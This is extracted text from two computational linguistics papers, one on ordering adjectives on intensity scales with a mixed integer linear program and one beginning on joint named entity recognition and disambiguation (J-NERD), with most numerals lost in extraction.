corpus. mohammad et al. ( ) proposed a method of identifying whether two adjectives are antonymous. this problem is related but distinct, because the de- gree of antonymy does not necessarily determine their position on an intensity scale. antonyms (e.g., little, big) are not necessarily on the extreme ends of scales. sheinman and tokunaga ( ) and sheinman et al. ( ) present the most closely related previous work on adjective intensities. they collect lexico- semantic patterns via bootstrapping from seed adjec- tive pairs to obtain pairwise intensities, albeit using search engine ‘hits’, which are unstable and prob- lematic (kilgarriff, ). while their approach is primarily evaluated in terms of a local pairwise classification task, they also suggest the possibil- ity of ordering adjectives on a scale using a pivot- based partitioning approach. although intuitive in theory, the extracted pairwise scores are frequently too sparse for this to work. thus, many adjec- tives have no score with a particular headword. in our experiments, we reimplemented this approach and show that our milp method improves over it by allowing individual pairwise decisions to benefit more from global information. 
schulam and fell- baum ( ) apply the approach of sheinman and tokunaga ( ) to german adjectives. our method extends easily to various foreign languages as de- scribed in section . another related task is the extraction of lexico- syntactic and lexico-semantic intensity-order pat- terns from large text corpora (hearst, ; chklovski and pantel, ; tandon and de melo, ). sheinman and tokunaga ( ) follows davidov and rappoport ( ) to automatically bootstrap adjective scaling patterns using seed ad- jectives and web hits. these methods thus can be used to provide the input patterns for our algorithm. verbocean by chklovski and pantel ( ) ex- tracts various fine-grained semantic relations (in- cluding the stronger-than relation) between pairs of verbs, using lexico-syntactic patterns over the web. our approach of jointly ranking a set of words using pairwise evidence is also applicable to the verbo- cean pairs, and should help address similar sparsity issues of local pairwise decisions. such scales will again be quite useful for language learners and lan- guage understanding tools. de marneffe et al. ( ) infer yes-or-no answers to questions with responses involving scalar adjec- tives in a dialogue corpus. they correlate adjectives with ratings in a movie review corpus to find that good appears in lower-rated reviews than excellent. finally, there has been a lot of work on measuring the general sentiment polarity of words (hatzivas- siloglou and mckeown, ; hatzivassiloglou and wiebe, ; turney and littman, ; liu and seneff, ; taboada et al., ; yessenalina and cardie, ; pang and lee, ). our work in- stead aims at producing a large, unrestricted number of individual intensity scales for different qualities and hence can help in fine-grained sentiment analy- sis with respect to very particular content aspects. experiments . data input clusters in order to obtain input clusters for evaluation, we started out with the satellite cluster or ‘dumbbell’ structure of adjectives in wordnet . , which consists of two direct antonyms as the poles and a number of other satellite adjectives that are se- mantically similar to each of the poles (gross and miller, ). for each antonymy pair, we deter- mined an extended dumbbell set by looking up syn- onyms and words in related (satellite adjective and ‘see-also’) synonym sets. we cut such an extended dumbbell into two antonymous halves and treated each of these halves as a potential input adjective cluster. most of these wordnet clusters are noisy for the purpose of our task, i.e. they contain adjectives that appear unrelatable on a single scale due to polysemy and semantic drift, e.g. violent with respect to super- natural and affected. motivated by sheinman and tokunaga ( ), we split such hard-to-relate ad- jectives into smaller scale-specific subgroups using the corpus evidence . for this, we consider an undi- note that we do not use the wordnet dataset of sheinman and tokunaga ( ) for evaluation, as it does not provide full - - # of c ha in s length of chain figure : the histogram of cluster sizes after partitioning. # of c ha in s length of chain figure : the histogram of cluster sizes in the test set. rected edge between each pair of adjectives that has a non-zero intensity score (based on the web-scale scoring procedure described in section . . ). 
the resulting graph is then partitioned into connected components such that any adjectives in a subgraph are at least indirectly connected via some path and thus much more likely to belong to the same inten- sity scale. while this does break up partitions when- ever there is no corpus evidence connecting them, ordering the adjectives within each such partition re- mains a challenging task. this is because the web evidence will still not necessarily directly relate all adjectives (in a partition) to each other. addition- ally, the web evidence may still indicate the wrong direction. figure shows the size distribution of the resulting partitions. patterns to construct our intensity pattern set, we started with a couple of common rankable adjective seed pairs such as (good, great) and (hot, boiling) and used the web-scale n-grams corpus (brants and franz, ) to collect the few most frequent pat- terns between and around these seed-pairs (in both directions). among these, we manually chose a scales. instead, their annotators only made pairwise compar- isons with select words, using a -way classification scheme (neutral, mild, very mild, intense, very intense). small set of intuitive patterns that are linguistically useful for ordering adjectives, several of which had not been discovered in previous work. these are shown in table . note that we only collected pat- terns that were not ambiguous in the two orders, for example the pattern ’? , not ?’ is ambiguous be- cause it can be used as both ’good, not great’ and ’great, not good’. alternatively, one can easily also use fully-automatic bootstrapping techniques based on seed word pairs (hearst, ; chklovski and pantel, ; yang and su, ; turney, ; davidov and rappoport, ). however, our semi- automatic approach is a simple and fast process that extracts a small set of high-quality and very gen- eral adjective-scaling patterns. this process can quickly be repeated from scratch in any other lan- guage. moreover, as described in section . , the english patterns can also be projected automatically to patterns in other languages. development and test sets section . describes the method for collecting the intensity scores for ad- jective pairs, using web-scale n-grams (brants and franz, ). we relied on a small development set to test the milp structure and the pairwise score setup. for this, we manually chose representative adjective clusters from the full set of clusters. the final test set, distinct from this development set, consists of word pairs in clusters, each annotated by two native speakers of english. both the gold test data (and our code) are freely avail- able. to arrive at this data, we randomly drew clusters each for cluster sizes , , and + from the histogram of partitioned adjective clusters in fig- ure . while labeling a cluster, annotators could ex- clude words that they deemed unsuitable to fit on a single shared intensity scale with the rest of the cluster. fortunately, the partitioning described ear- lier had already separated most such cases into dis- tinct clusters. the annotators ordered the remaining words on a scale. words that seemed indistinguish- able in strength could share positions in their anno- tation. as our goal is to compare scale formation algo- rithms, we did not include trivial clusters of size . on such trivial clusters, the web evidence alone de- termines the output and hence all algorithms, includ- http://demelo.org/gdm/intensity/ ing the baseline, obtain the same pairwise accuracy (defined below) of . 
% on a separate set of ran- dom clusters of size . figure shows the distribution of cluster sizes in our main gold set. the inter-annotator agreement in terms of cohen’s κ (cohen, ) on the pairwise classification task with labels (weaker, stronger, or equal/unknown) was . . in terms of pairwise accuracy, the agreement was . %. . metrics in order to thoroughly evaluate the performance of our adjective ordering procedure, we rely on both pairwise and ranking-correlation evaluation metrics. consider a set of input words a = {a ,a , . . . ,an} and two rankings for this set – a gold-standard rank- ing rg(a) and a predicted ranking rp (a). . . pairwise accuracy for a pair of words ai, aj, we may consider the classification task of choosing one of three labels (<, >, =?) for the case of ai being weaker, stronger, and equal (or unknown) in intensity, respectively, com- pared to a : l(a ,a ) =    < if r(ai) < r(aj) > if r(ai) > r(aj) =? if r(ai) = r(aj) for each pair (a ,a ), we compute gold-standard labels lg(a ,a ) and predicted labels lp (a ,a ) as above, and then the pairwise accuracy pw(a) for a particular ordering on a is simply the fraction of pairs that are correctly classified, i.e. for which the predicted label is same as the gold-standard label: pw(a) = ∑ i<j {lg(ai,aj) = lp (ai,aj)} ∑ i<j . . ranking correlation coefficients our second type of evaluation assesses the rank correlation between two ranking permutations (gold-standard and predicted). many studies use kendall’s tau (kendall, ), which measures the total number of pairwise inversions, while others prefer spearman’s rho (spearman, ), which measures the l distance between ranks. kendall’s tau correlation coefficient we use the τb version of kendall’s correlation metric, as it in- corporates a correction for ties (kruskal, ; dou et al., ): τb = p −q√ (p + q + x ) · (p + q + y ) where p is the number of concordant pairs, q is the number of discordant pairs, x is the number of pairs tied in the first ranking, y is the number of pairs tied in the second ranking. given the two rank- ings of an adjective set a, the gold-standard ranking rg(a) and the predicted ranking rp (a), two words ai, aj are: • concordant iff both rankings have the same strict order of the two elements, i.e., rg(ai) > rg(aj) and rp (ai) > rp (aj), or rg(ai) < rg(aj) and rp (ai) < rp (aj). • discordant iff the two rankings have an inverted strict order of the two elements, i.e., rg(ai) > rg(aj) and rp (ai) < rp (aj), or rg(ai) < rg(aj) and rp (ai) > rp (aj). • tied iff rg(ai) = rg(aj) or rp (ai) = rp (aj). spearman’s rho correlation coefficient for two n-sized ranked lists {xi} and {yi}, the spearman correlation coefficient is defined as the pearson cor- relation coefficient between the ranks of variables: ρ = ∑ i (xi − x̄) · (yi − ȳ) √∑ i (xi − x̄) · ∑ i (yi − ȳ) here, x̄ and ȳ denote the means of the values in the respective lists. we use the standard procedure for handling ties correctly. tied values are assigned the average of all ranks of items sharing the same value in the ranked list sorted in ascending order of the values. handling inversions while annotating, we some- times observed that the ordering itself was very clear but the annotators disagreed about which end of a particular scale was to count as the strong one, e.g. when transitioning from soft to hard or from alpha to beta. we thus also report average absolute values of both correlation coefficients, as these properly ac- count for anticorrelations. 
our test set only contains clusters of size or larger, so there is no need to account for inversions in clusters of size . . results in table , we use the evaluation metrics mentioned above to compare several different approaches. web baseline the first baseline simply reflects the original pairwise web-based intensity scores. we classify (with one of labels) a given pair of adjectives using the web-based intensity scores (as described in section . . ) as follows: lbaseline(a ,a ) =    < if score(ai,aj) > > if score(ai,aj) < =? if score(ai,aj) = since score(ai,aj) represents the weak-strong score of the two adjectives, a more positive value means a higher likelihood of ai being weaker (<, on the left) in intensity than aj. in table , we observe that the (micro-averaged) pairwise accuracy, as defined earlier, for the origi- nal web baseline is . %, while the ranking mea- sures are undefined because the individual pairs do not lead to a coherent scale. divide-and-conquer the divide-and-conquer baseline recursively splits a set of words into three subgroups, placed to the left (weaker), on the same position (no evidence), or to the right (stronger) of a given randomly chosen pivot word. while this approach shows only a minor improve- ment in terms of the pairwise accuracy ( . %), its main benefit is that one obtains well-defined inten- sity scales rather than just a collection of pairwise scores. sheinman and tokunaga the approach by sheinman and tokunaga ( ) involves a simi- lar divide-and-conquer based partitioning in the first phase, except that their method makes use of syn- onymy information from wordnet and uses all syn- onyms in wordnet’s synset for the headword as neutral pivot elements (if the headword is not in wordnet, then the word with the maximal unigram frequency is chosen). in the second phase, their method performs pairwise comparisons within the more intense and less intense subgroups. we reim- plement their approach here, using the google n- grams dataset instead of online web search engine hits. we observe a small improvement over the web baseline in terms of pairwise accuracy. note that the method pairwise accuracy avg. τ avg. |τ| avg. ρ avg. |ρ| web baseline . % n/a n/a n/a n/a divide-and-conquer . % . . . . sheinman and tokunaga ( ) . % n/a n/a n/a n/a milp . % . . . . milp with synonymy . % . . . . inter-annotator agreement . % . . . . table : main test results predicted class weaker tie stronger true class weaker tie stronger table : confusion matrix (web baseline) rank correlation measure scores are undefined for their approach. this is because in some cases their method placed all words on the same position in the scale, which these measures cannot handle even in their tie-corrected versions. overall, the sheinman and tokunaga approach does not aggregate informa- tion sufficiently well at the global level and often fails to make use of transitive inference. milp our milp exploits the same pairwise scores to induce significantly more accurate pair- wise labels with . % accuracy, a % relative error reduction over the web baseline, % over divide-and-conquer, and % over sheinman and tokunaga ( ). we further see that our milp method is able to exploit external synonymy (equiv- alence) information (using synonyms marked by the annotators). the accuracy of the pairwise scores as well as the quality of the overall ranking increase even further to . %, approaching the human inter- annotator agreement. 
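as a side note to the comparison above, the divide-and-conquer baseline can be reconstructed in a few lines. the sketch below is our own reading of the description, not the original implementation; it assumes a pairwise function score(a, b) whose sign follows the web-baseline convention, i.e. positive values indicate corpus evidence that a is weaker than b.

```python
import random

def divide_and_conquer(words, score, offset=0.0, step=1.0):
    """Place words on an intensity scale by recursive pivot partitioning.

    score(a, b) > 0 means evidence that a is weaker than b, < 0 that a is
    stronger, and 0 that there is no evidence either way. Returns a dict
    mapping each word to a numeric scale position; only the induced order
    (and ties) of these positions is meaningful.
    """
    if not words:
        return {}
    if len(words) == 1:
        return {words[0]: offset}
    pivot = random.choice(words)
    weaker, same, stronger = [], [pivot], []
    for w in words:
        if w == pivot:
            continue
        s = score(w, pivot)
        if s > 0:
            weaker.append(w)        # evidence: w weaker than the pivot
        elif s < 0:
            stronger.append(w)      # evidence: w stronger than the pivot
        else:
            same.append(w)          # no evidence: share the pivot's position
    positions = {w: offset for w in same}
    positions.update(divide_and_conquer(weaker, score, offset - step, step / 2))
    positions.update(divide_and_conquer(stronger, score, offset + step, step / 2))
    return positions
```

note that each decision here is made only relative to a single randomly chosen pivot, so, unlike the milp, no transitive inference across the resulting subgroups takes place, which is consistent with the minor improvement reported for this baseline above.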
in terms of average correlation coefficients, we observe similar improvement trends from the milp, but of different magnitudes, because these averages give small clusters the same weight as larger ones. . analysis confusion matrices for a given approach, we can study the confusion matrix obtained by cross- tabulating the gold classification with the predicted predicted class weaker tie stronger true class weaker tie stronger table : confusion matrix (milp) classification of every unique pair of adjectives in the ground truth data. table shows the confusion matrix for the web baseline. we observe that due to the sparsity of pairwise intensity order evidence, the baseline method predicts too many ties. table provides the confusion matrix for the milp (without external equivalence information) for comparison. although the middle column still shows that the milp predicts more ties than humans annotators, we find that a clear majority of all unique pairs are now correctly placed along the diagonal. this confirms that our milp successfully infers new ordering decisions, although it uses the same input (corpus evidence) as the baseline. the remaining ties are mostly just the result of pairs for which there simply is no evidence at all in the input web counts. note that this problem could for instance be circum- vented by relying on a crowdsourcing approach: a few dispersed tie-breakers are enough to allow our milp to correct many other predictions. predicted examples finally, in table , we pro- vide a selection of real results obtained by our algo- rithm. for instance, it correctly inferred that terri- fying is more intense than creepy or scary, although the web pattern counts did not provide any explicit information about these words pairs. in some cases, however, the web evidence did not suffice to draw the right conclusions, or it was misleading due to is- sues like polysemy (as for the word funny). accuracy prediction gold standard good hard < painful < hopeless hard < painful < hopeless full < stuffed < (overflowing, overloaded) full < stuffed < overflowing < overloaded unusual < uncommon < rare < exceptional < extraordinary uncommon < unusual < rare < extraordinary < exceptional average creepy < scary < sinister < frightening < terrifying creepy < (scary, frightening) < terrifying < sinister bad (awake, conscious) < alive < aware alive < awake < (aware, conscious) strange < (unusual, weird) < (funny, eerie) (strange, funny) < unusual < weird < eerie table : some examples (of bad, average and good accu- racy) of our milp predictions (without synonymy infor- mation) and the corresponding gold-standard annotation. while we show results on gold-standard chains here for evaluation purposes, in practice one can also recombine two [ , ] chains for a pair of antonymic clusters to form a single scale from [− , ] that visu- alizes the full spectrum of available adjectives along a dimension, from adjacent all the way to removed, or from black to glaring. extension to multilingual ordering our method for globally ordering words on a scale can easily be applied to languages other than en- glish. the entire process is language-independent as long as the required resources are available and a small number of patterns are chosen. for morpho- logically rich languages, the information extraction step of course may require additional morphologi- cal analysis tools for stemming and aggregating fre- quencies across different forms. 
alternatively, a cross-lingual projection approach is possible at multiple levels, utilizing information from the english data and ranking. as the first step, the set of words in the target language that we wish to rank can be projected from the english word set if necessary – e.g., as shown in de melo and weikum ( ). next, we outline two projection methods for the ordering step. the first method is based on pro- jection of the english intensity-ordering patterns to the new language, and then using the same milp as described in section . . in the second method, we also change the milp and add cross-lingual con- straints to better inform the target language’s ad- jective ranking. a detailed empirical evaluation of these approaches remains future work. . cross-lingual pattern projection instead of creating new patterns, in many cases we obtain quite adequate intensity patterns by us- ing cross-lingual projection. we simply take sev- eral adjective pairs, instantiate the english patterns with them, and obtain new patterns using a machine translation system. filling the wildcards in a pat- tern, say ‘? but not ?’, with good/excellent results in ‘good but not excellent’. this phrase is then trans- lated into the target language using the translation system, say into german ‘gut aber nicht ausgezeich- net’. finally, put back the wildcards in the place of the translations of the adjective words, here gut and ausgezeichnet, to get the corresponding german pat- tern ‘? aber nicht ?’. table shows various german intensity patterns that we obtain by projecting from the english patterns as described. the process is re- peated with multiple adjective pairs in case different variants are returned, e.g. due to morphology. most of these translations deliver useful results. now that we have the target language adjectives and the ranking patterns, we can compute the pair- wise intensity scores using large-scale data in that language. we can use the google n-grams cor- pora for european languages (brants and franz, ), and also for chinese (ldc t ) and japanese (ldc t ). for other languages, one can use available large raw-text corpora or web crawling tools. . crosslingual milp to improve the rankings for lesser-resourced lan- guages, we can further use a joint milp approach for the new language we want to transfer this pro- cess to. additional constraints between the english weak-strong patterns strong-weak patterns english german english german ? but not ? ? aber nicht ? not ? just ? nicht ? gerade ? ? if not ? ? wenn nicht ? not ? but just ? nicht ? aber nur ? ? and almost ? ? und fast ? not ? though still ? nicht ? aber immer noch ? not just ? but ? nicht nur ? sondern ? ? or very ? ? oder sehr ? table : examples of german intensity patterns projected (translated) directly from the english patterns. words and their corresponding target language trans- lations, in combination with the english ranking in- formation, allow the algorithm to obtain better rank- ings for the target words whenever the non-english target language corpus does not provide sufficient intensity order evidence. in this case, the input set a contains words in multiple languages. the web intensity scores score(ai,aj) should be set to zero when comparing words across languages. we instead link them using a translation table t ⊆ { , . . . ,n} × { , . . . ,n} from a translation dictionary or phrase table. here, (i,j) ∈ t signifies that ai is a translation of aj. 
we do not require a bijective relationship between them (i.e., translations needn’t be unique). the objective function is augmented by adding the new term ∑ (i,j)∈t (w′ij + s ′ ij)ct ( ) for a constant ct > that determines how much weight we assign to translations as opposed to the corpus count scores. the milp is extended by adding the following extra constraints. dij −w′ijct < −dmax ∀i,j ∈{ , . . . ,n} dij + ( −w′ij)ct ≥−dmax ∀i,j ∈{ , . . . ,n} dij + s ′ ijct > dmax ∀i,j ∈{ , . . . ,n} dij − ( −s′ij)ct ≤ dmax ∀i,j ∈{ , . . . ,n} w′ij ∈{ , } ∀i,j ∈ t s′ij ∈{ , } ∀i,j ∈ t the variables di,j, as before, encode distances be- tween positions of words on the scale, but now also include cross-lingual pairs of words in different lan- guages. the new constraints encourage translational equivalents to remain close to each other, preferably within a desired (but not strictly enforced) maximum distance dmax. the new variables w′ij, s ′ ij are sim- ilar to wij, sij in the standard milp. however, the w′ij become if and only if dij ≥−dmax and the s′ij become if and only if dij ≤ dmax. if both w′ij and s′ij are , then the two words have a small distance −dmax ≤ dij ≤ dmax. the augmented objective function explicitly encourages this for translational equivalents. overall, this approach thus allows evi- dence from a language with more web evidence to improve the process of adjective ordering in lesser- resourced languages. conclusion in this work, we have presented an approach to the challenging and little-studied task of ranking words in terms of their intensity on a continuous scale. we address the issue of sparsity of the intensity order ev- idence in two ways. first, pairwise intensity scores are computed using linguistically intuitive patterns in a very large, web-scale corpus. next, a mixed integer linear program (milp) expands on this fur- ther by inferring new relative relationships. instead of making ordering decisions about word pairs in- dependently, our milp considers the joint decision space and factors in e.g. how two adjectives relate to some third adjective, thus enforcing global con- straints such as transitivity. our approach is general enough to allow addi- tional evidence such as synonymy in the milp, and can straightforwardly be applied to other word classes (such as verbs), and to other languages (monolingually as well as cross-lingually). the overall results across multiple metrics are substan- tially better than previous approaches, and fairly close to human agreement on this challenging task. acknowledgments we would like to thank the editor and the anony- mous reviewers for their helpful feedback. references mohit bansal and dan klein. . web-scale features for full-scale parsing. in proceedings of acl . thorsten brants and alex franz. . the google web t -gram corpus version . . ldc t . thorsten brants and alex franz. . web t -gram, european languages, version . ldc t . timothy chklovski and patrick pantel. . verbo- cean: mining the web for fine-grained semantic verb relations. in proceedings of emnlp . jacob cohen. . a coefficient of agreement for nom- inal scales. educational and psychological measure- ment, ( ): – . dmitry davidov and ari rappoport. . unsuper- vised discovery of generic relationships using pattern clusters and its evaluation by automatically generated sat analogy questions. in proceedings of acl . marie-catherine de marneffe, christopher d. manning, and christopher potts. . was it good? it was provocative. learning the meaning of scalar adjectives. 
in proceedings of acl . gerard de melo and gerhard weikum. . towards a universal wordnet by learning from combined evi- dence. in proceedings of cikm . zhicheng dou, ruihua song, xiaojie yuan, and ji-rong wen. . are click-through data adequate for learn- ing web search rankings? in proc. of cikm . derek gross and katherine j. miller. . adjectives in wordnet. international journal of lexicography, ( ): – . vasileios hatzivassiloglou and kathleen r. mckeown. . towards the automatic identification of adjecti- val scales: clustering adjectives according to meaning. in proceedings of acl . vasileios hatzivassiloglou and kathleen r. mckeown. . predicting the semantic orientation of adjec- tives. in proceedings of acl . vasileios hatzivassiloglou and janyce m. wiebe. . effects of adjective orientation and gradability on sen- tence subjectivity. in proceedings of coling . marti hearst. . automatic acquisition of hyponyms from large text corpora. in proceedings of coling . diana inkpen and graeme hirst. . building and using a lexical knowledge base of near-synonym dif- ferences. computational linguistics, ( ): – . maurice g. kendall. . a new measure of rank cor- relation. biometrika, ( / ): – . adam kilgarriff. . googleology is bad science. computational linguistics, ( ). william h. kruskal. . ordinal measures of associa- tion. journal of the american statistical association, ( ): – . jingjing liu and stephanie seneff. . review senti- ment scoring via a parse-and-paraphrase paradigm. in proceedings of emnlp . george a. miller. . wordnet: a lexical database for english. communications of the acm, ( ): – . said m. mohammad, bonnie j. dorr, graeme hirst, and peter d. turney. . computing lexical contrast. computational linguistics. bo pang and lillian lee. . opinion mining and sentiment analysis. foundations and trends in infor- mation retrieval, ( - ): – , january. peter f. schulam and christiane fellbaum. . au- tomatically determining the semantic gradation of ger- man adjectives. in proceedings of konvens . vera sheinman and takenobu tokunaga. . adjs- cales: visualizing differences between adjectives for language learners. ieice transactions on information and systems, ( ): – . vera sheinman, takenobu tokunaga, i. julien, p. schu- lam, and c. fellbaum. . refining wordnet adjec- tive dumbbells using intensity relations. in proceed- ings of global wordnet conference . rion snow, daniel jurafsky, and andrew y. ng. . semantic taxonomy induction from heterogenous evi- dence. in proceedings of coling/acl . charles spearman. . the proof and measurement of association between two things. the american journal of psychology, ( ): – . fabian m. suchanek, mauro sozio, and gerhard weikum. . sofie: a self-organizing framework for information extraction. in proceedings of www . maite taboada, julian brooke, milan tofiloskiy, and kimberly vollz. . lexicon-based methods for sentiment analysis. computational linguistics. niket tandon and gerard de melo. . information extraction from web-scale n-gram data. in proceed- ings of the sigir web n-gram workshop. peter d. turney and michael l. littman. . mea- suring praise and criticism: inference of semantic orientation from association. acm trans. inf. syst., ( ): – , october. peter d. turney. . a uniform approach to analogies, synonyms, antonyms, and associations. in proceed- ings of coling . xiaofeng yang and jian su. . coreference resolu- tion using semantic relatedness information from auto- matically discovered patterns. in proceedings of acl . 
ainur yessenalina and claire cardie. . composi- tional matrix-space models for sentiment analysis. in proceedings of emnlp . j-nerd: joint named entity recognition and disambiguation with rich linguistic features abstract methods for named entity recogni- tion and disambiguation (nerd) perform ner and ned in two separate stages. therefore, ned may get penalized by ner false positives, and suffers in re- call by false negatives. conversely, ned does not fully exploit information com- puted by ner such as types of men- tions. this paper presents j-nerd, a new approach to perform ner and ned jointly, by means of a probabilistic graph- ical model that captures mention spans, mention types, and the mapping of men- tions to entities in a knowledge base. we present experiments with different kinds of texts from the conll’ , ace’ , and clueweb’ -facc corpora. j-nerd consistently outperforms state-of-the-art competitors in end-to-end nerd preci- sion, recall, and f . introduction motivation: methods for named entity recog- nition and disambiguation, nerd for short, typi- cally proceed in two stages: • at the ner stage, text spans of entity men- tions are detected and tagged with coarse- grained types like person, organization, loca- tion, etc. this is typically performed by a trained conditional random field (crf) over word sequences (e.g., (finkel et al., )). • at the ned stage, mentions are mapped to entities in a knowledge base (kb) based on contextual similarity measures and the seman- tic coherence of the selected entities (e.g., (cucerzan, ; hoffart et al., ; ratinov et al., )). this two-stage approach has limitations. first, ner may produce false positives that can mis- guide ned. second, ner may miss out on some entity mentions, and ned has no chance to com- pensate for these false negatives. third, ned is not able to help ner, for example, by disambigua- tion “easy” mentions (e.g., of prominent entities with more or less unique names) and then using the entities and knowledge about them as enriched features for ner. example: consider the following sentences: david played for manu, real, and la galaxy. his wife posh performed with the spice girls. this is difficult for ner because of the absence of upper-case spelling, which is not untypical in social media, for example. most ner methods will miss out on multi-word mentions or words that are also common nouns (“spice”) or adjec- tives (“posh”, “real”). typically, ner would pass only the mentions “david”, “manu”, and “la” to the ned stage, which then is prone to many errors like mapping the first two mentions to any promi- nent people with first names david and manu, and mapping the third one to the city of los ange- les. with ner and ned performed jointly, the possible disambiguation of “la galaxy” to the soc- cer club can guide ner to tag the right mentions with the right types (e.g., recognizing that “manu” could be a short name for a soccer team), which in turn helps ned to map “david” to the right entity david beckham. contribution: this paper presents a novel kind of probabilistic graphical model for the joint recogni- tion and disambiguation of named-entity mentions in natural-language texts. with this integrated ap- proach to nerd, we aim to overcome the limi- tations of the two-stage ner/ned methods dis- cussed above. our method, coined j-nerd , is based on a supervised, non-linear crf that combines multi- ple per-sentence crf’s into an entity-coherence- aware global crf. 
the global crf detects men- tion spans, tags them with coarse-grained types, and maps them to entities in a single joint- inference step based on gibbs sampling. the j-nerd method comprises the following novel contributions: • a tree-shaped crf for each sentence, whose structure is derived from the dependency parse tree and thus captures linguistic context in a deeper way compared to prior work with crf’s for ner and ned; • richer linguistic features not considered in prior work, harnessing dependency parse trees and verbal patterns that indicate mention types as part of their nsubj or nobj arguments; • an inference method that maintains the un- certainty of both mention candidates (i.e., to- ken spans) and entity candidates for competing mention candidates and makes joint decisions, as opposed to fixing mentions before reason- ing on their disambiguation. we present experiments with three major datasets: the conll’ collection of newswire articles, the ace’ corpus of news and blogs, and the clueweb’ -facc corpus of web pages. baselines that we compare j-nerd with include aida-light (nguyen et al., ), spotlight (daiber et al., ), and tagme (ferragina and scaiella, ), and the recent joint ner/ned method of durrett and klein ( ). j-nerd consistently outperforms these competitors in terms of both precision and recall. the j-nerd code and all experi- mental data are publicly available at the url anonymized-for-doubleblind-review. related work ner: detecting the boundaries of text spans that denote named entities has been mostly addressed by supervised crf’s over word sequences (mc- callum and li, ; finkel et al., ). the work of ratinov and roth ( ) improved these techniques by additional features from context ag- gregation and external lexical sources (gazetteers, etc.). passos et al. ( ) harnessed skip-gram features and external dictionaries for further im- provement. an alternative line of ner techniques is based on dictionaries of name-entity pairs, in- cluding nicknames, short-hand names, and para- phrases (e.g., “the first man on the moon”). the work of ferragina (ferragina and scaiella, ) and mendes (mendes et al., ) are examples of dictionary-based ner. the work of spitkovsky and chang ( ) is an example for a large-scale dictionary that can be harnessed by such methods. an additional output of the crf’s are type tags for the recognized word spans, typically limited to coarse-grained types like person, organization, and location (and also miscellaneous). the most widely used tool of this kind is the stanford ner tagger (finkel et al., ). many ned tools use the stanford ner tagger for their first stage of detecting mentions. mention typing: the specific ner of inferring semantic types has been further refined and ex- tended by various works on fine-grained typing (e.g., politicians, musicians, singers, guitarists) for entity mentions and general noun phrases (fleis- chman and hovy, ; rahman and ng, ; ling and weld, ; yosef et al., ; nakas- hole et al., ). most of this work is based on supervised classification, using linguistic features from mentions and their surrounding text. one exception is the work of nakashole et al. ( ) which is based on text patterns that connect enti- ties of specific types, acquired by sequence mining from the wikipedia full-text corpus. in contrast to our work, these are simple surface patterns, and the task addressed here is limited to typing noun phrases that likely denote emerging entities that are not yet registered in a kb. 
ned: methods and tools for ned go back to the seminal works of (dill et al., ; bunescu and pasca, ; cucerzan, ; milne and witten, ). more recent advances led to open-source tools like the wikipedia miner wikifier (milne and witten, ), the illinois wikifier (ratinov et al., ), spotlight (mendes et al., ), se- manticizer (meij et al., ) tagme (ferragina and scaiella, ; cornolti et al., ), and aida (hoffart et al., ) with its improved vari- ant aida-light (nguyen et al., ). we choose some, namely, spotlight, tagme and aida-light, as baselines for our experiments. these are the best-performing, publicly available systems for news and web texts. most of these methods com- bine contextual similarity measures with some form of considering the coherence among a se- lected set of candidate entities for the disambigua- tion. the latter aspect can be cast into a variety of computational models, like graph algorithms (hoffart et al., ), integer linear programming (ratinov et al., ), or probabilistic graphical models (kulkarni et al., ). all these methods use the stanford ner tagger or dictionary-based matching for their ner stages. kulkarni et al. ( ) uses an ilp or lp solver (with rounding) for the ned inference, which is computationally expensive. note that some of the ned tools aim to link not only named entities but also general concepts (e.g. “world peace”) for which wikipedia has articles. in this paper, we solely focus on proper entities. joint nerd: there is little prior work on per- forming ner and ned jointly. (sil and yates, ; durrett and klein, ) are the most no- table methods. sil and yates ( ) first com- piles a liberal set of mention and entity candidates, and then performs joint ranking of the candidates. durrett and klein ( ) presents a crf model for coreference resolution, mention typing, and mention disambiguation. our model is also based on crf’s, but distinguishes itself from prior work in three ways: ) tree-shaped per-sentence crf’s derived from dependency parse trees, as opposed to merely having connections among mentions and entity candidates; ) linguistic features about ver- bal phrases from dependency parse trees; ) main- taining candidates for both mentions and entities and jointly reasoning on their uncertainty. our ex- periments include comparisons with the method of (durrett and klein, ). there are also benchmarking efforts on mea- suring the performance for end-to-end nerd (cornolti et al., ; carmel et al., ; us- beck et al., ), as opposed to assessing ner and ned separately. however, to the best of our knowledge, none of the participants in these com- petitions considered integrating ner and ned. overview of the j-nerd method for labeling the token sequence 〈tok , . . . , tokm〉 with mention boundaries, ner types, and ned entities, we have devised different kinds of graph- ical models (koller et al., ). while state-of- the-art methods like the stanford ner tagger em- ploy a linear-chain crf (sutton and mccallum, ) for this task, we use more sophisticated tree- shaped models whose structure is obtained from dependency parse trees. the per-sentence crf’s are then combined into a global model by adding cross-sentence dependencies whenever the same token sequence appears as mention candidates in several sentences. figure gives an example of a global crf for two sentences. these crf models use a variety of features. 
some of these are fairly standard for ner/ned, whereas others are novel contributions of this pa- per: • standard features include lexico-syntactic properties of tokens like pos tags, matches in dictionaries/gazetteers, and similarity mea- sures between token strings and entity names. also, entity-entity coherence is an important feature for ned – not exactly a standard fea- ture, but used in some prior works. • features about the topical domain of an input text (e.g., politics, sports, football, etc.) are obtained by a classifier based on “easy men- tions”: those mentions for which the ned de- cision can be made with very high confidence without advanced features. the use of do- mains for ned was introduced by (nguyen et al., ). here we further extend this tech- nique by harnessing domain features for joint inference on ner and ned. • the most advanced feature group captures typed dependencies from the sentence pars- ing. such features have not been used in prior work. the feature space of j-nerd is presented in de- tail in section ; the graphical models and their learning and inference methods are further dis- cussed in section . in the rest of this section we introduce various building blocks that j-nerd uses for preprocess- ing inputs and for computing features. . language processing we employ the stanford corenlp tool suite (nlp.stanford.edu/software/corenlp.shtml) for processing input documents. this includes tokenization, sentence detection, pos tagging, lemmatization, and dependency parsing. all of these provide features for our crf model. in particular, we harness dependency types between noun phrases (de marneffe et al., ), like nsubj, dobj, prep in, prep for, etc. . entity repository and name-entity dictionary we utilize a large knowledge base, namely, yago (hoffart et al., ), as an entity repo- sitiory and as a major source of a dictionary of name-entity pairs (aliases incl. paraphrases). for the latter, we import the yago means and hasname relations, a total of more than mil- lion name-entity pairs (for ca. million distinct entities). we also derive ner-type-specific phrase dictionaries. to this end, we also import sup- porting phrases from gate (cunningham et al., ), e.g., “mr.”, “mrs.”, “dr.”, “president”, etc. for the type person, “city”, “river”, “park”, etc. for the type location, “company”, “institute”, “inc.”, “ltd.”, etc. for the type organization. context statistics: to compute values for the features described in section , we obtain statis- tics for different kinds of contexts for tokens and candidate entities. we distinguish two kinds of contexts: i) based on other tokens, and ii) based on patterns of parsing dependencies; these are represented as a bag-of-words or a bag-of- linguistic-patterns, respectively, each with tf-idf scores. here tf denotes token frequencies and 